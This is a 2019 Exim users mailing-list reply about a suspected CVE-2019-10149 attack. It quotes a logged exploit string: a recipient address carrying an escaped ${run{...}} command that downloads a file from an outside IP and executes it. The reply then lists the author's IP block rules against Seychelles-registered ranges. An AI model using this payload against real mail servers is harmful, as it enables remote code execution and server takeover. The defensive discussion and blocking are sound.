Re: [exim] just been hacked, could be CVE-2019-10149?

Klaus Ethgen via Exim-users Tue, 11 Jun 2019 00:58:04 -0700

Hi,

Am Di den 11. Jun 2019 um  7:53 schrieb Cyborg via Exim-users:
> <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ekqvuhtpi\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ekqvuhtpi\x20\x2dn\x22\x20\x26}}@xxxxxxxxxxxxxxxx.de>:
> Restricted characters in address


Oh, you censored the address you are sending from? :-D

> This attack was presented to you by... the Seychelles Islands.

Ah, and I woundered why I did not see any try in my logs.

But I have the following blocks:
   141.101.132.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   146.185.205.0/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   185.14.194.0/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   185.2.32.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   185.46.84.128/25 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   185.89.100.0/24 timeout 0 packets 48 bytes 2304 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   188.68.0.0/24 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   188.68.3.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-31"
   188.72.126.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   188.72.127.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   188.72.96.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   193.93.192.0/24 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   194.40.241.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2018-10-27"
   46.161.60.0/25 timeout 0 packets 12 bytes 576 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   46.161.61.0/24 timeout 0 packets 12 bytes 576 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   5.101.217.128/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   5.101.219.0/24 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   5.101.220.128/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   5.101.221.0/24 timeout 0 packets 36 bytes 1728 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   5.188.216.0/24 timeout 0 packets 48 bytes 2304 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   5.189.205.128/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   5.189.206.128/25 timeout 0 packets 12 bytes 576 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   5.189.207.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   5.62.154.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   5.62.159.0/24 timeout 0 packets 12 bytes 576 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   5.8.47.0/24 timeout 0 packets 72 bytes 3456 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   79.110.17.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2018-01-27"
   79.110.28.0/25 timeout 0 packets 60 bytes 2880 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   80.82.64.0/24 timeout 0 packets 533 bytes 21952 comment "Durchseuchtes 
Seychelles-Botnetz 2019-05-14"
   88.214.26.0/24 timeout 0 packets 112 bytes 4480 comment "Durchseuchtes 
Seychelles-Botnetz 2019-02-09"
   89.248.168.0/24 timeout 0 packets 263 bytes 10520 comment "Durchseuchtes 
Seychelles-Botnetz 2019-03-21"
   91.200.80.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-31"
   91.204.14.128/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   93.179.90.0/24 timeout 0 packets 42 bytes 2016 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   95.181.176.0/24 timeout 0 packets 12 bytes 576 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   95.181.177.0/24 timeout 0 packets 48 bytes 2304 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-30"
   95.181.217.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2018-01-03"
   95.181.218.128/25 timeout 0 packets 12 bytes 576 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"
   95.85.68.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes 
Seychelles-Botnetz 2018-07-29"
   95.85.69.0/24 timeout 0 packets 36 bytes 1728 comment "Durchseuchtes 
Seychelles-Botnetz 2018-07-29"
   95.85.70.0/24 timeout 0 packets 72 bytes 3456 comment "Durchseuchtes 
Seychelles-Botnetz 2018-07-29"
   95.85.71.0/24 timeout 0 packets 36 bytes 1728 comment "Durchseuchtes 
Seychelles-Botnetz 2018-07-29"
   95.85.80.0/24 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes 
Seychelles-Botnetz 2017-12-29"

... in my ipfilter so blocking most of the net ranges that is owned by
Seychelles. There is nothing good coming from them. (The date is when I
blocket them.)

Regards
   Klaus
-- 
Klaus Ethgen                                       http://www.ethgen.ch/
pub  4096R/4E20AF1C 2011-05-16            Klaus Ethgen <[email protected]>
Fingerprint: 85D4 CA42 952C 949B 1753  62B3 79D0 B06F 4E20 AF1C

signature.asc
Description: PGP signature

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

Re: [exim] just been hacked, could be CVE-2019-10149?

Reply via email to